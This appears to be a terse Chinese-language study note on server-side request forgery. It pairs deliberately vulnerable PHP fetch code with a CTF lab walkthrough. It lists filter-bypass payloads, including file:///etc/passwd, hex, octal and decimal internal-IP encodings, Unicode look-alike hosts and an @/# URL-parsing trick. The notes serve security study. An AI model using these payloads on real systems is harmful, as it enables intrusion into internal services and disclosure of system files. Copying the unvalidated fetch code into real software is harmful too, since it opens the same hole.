sqli
, printer
的web service)file_get_contents()
<?php
if (isset($_POST['url'])) {
$content = file_get_contents($_POST['url']);
$filename ='./images/'.rand().';img1.jpg';
file_put_contents($filename, $content);
echo $_POST['url'];
$img = "<img src=\"".$filename."\"/>";
}
echo $img;
?>
fsockopen()
<?php
function GetFile($host,$port,$link) {
$fp = fsockopen($host, intval($port), $errno, $errstr, 30);
if (!$fp) {
echo "$errstr (error number $errno) \n";
} else {
$out = "GET $link HTTP/1.1\r\n";
$out .= "Host: $host\r\n";
$out .= "Connection: Close\r\n\r\n";
$out .= "\r\n";
fwrite($fp, $out);
$contents='';
while (!feof($fp)) {
$contents.= fgets($fp, 1024);
}
fclose($fp);
return $contents;
}
}
?>
curl_exec()
curl
requests url,放到server上<?php
if (isset($_POST['url'])) {
$link = $_POST['url'];
$curlobj = curl_init();
curl_setopt($curlobj, CURLOPT_POST, 0);
curl_setopt($curlobj,CURLOPT_URL,$link);
curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($curlobj);
curl_close($curlobj);
$filename = './curled/'.rand().'.txt';
file_put_contents($filename, $result);
echo $result;
}
?>
dict://
gopher://
file://
0300.0250.0.1
0xC0.0xA8.0.1
3232235521
0xC0A80001
http://www.google.com@192.168.0.1/
=> http://192.168.0.1
=> 192.168.0.1
xip.io
http://127.0.0.1.xip.io/
=> http://127.0.0.1/
127。0。0。1
=> 127.0.0.1
ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ >>> example.com
List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳
⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇
⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛
⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵
Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ
ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ
⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴
⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
詳情的繞過姿勢可以參考: https://github.com/w181496/Web-CTF-Cheatsheet#ssrf
basics
, advanced1
, advanced2
, advanced3
,環境架設除了basics
使用docker run
,其餘都用docker-compose
docker-compose
才run的起來也可以參考此篇
需要docker, docker-compose哦
安裝ctf環境
# clone git
git clone https://github.com/m6a-UdS/ssrf-lab.git
cd ~/ssrf-lab/ctf
docker-compose up -d
似乎要有amazon的伺服器才能測定,這邊我沒有設定Flag,有興趣的可以自行設定
code可以參考這個連結
http://secret1.corp
/etc/passwd
,用到之前學到的file://
協議file:///etc/passwd
10.0.0.38
,要去讀取secret3.corp
if '10.0.0.38' in url or 'secret2.corp' in url:
return 'Restricted Area!'
http://10.38
http://0x0a.0.0.26
http://0x0a000026
http://167772198
url = request.form['handler']
host = urlparse.urlparse(url).hostname
if host == 'secret3.corp':
return 'Restricted Area!'
else:
return urllib.urlopen(url).read()
#
之前的能夠繞過urlbypass,反而在@
之後的會是我們真正要access的serverhttp://google.com# @secret3.corp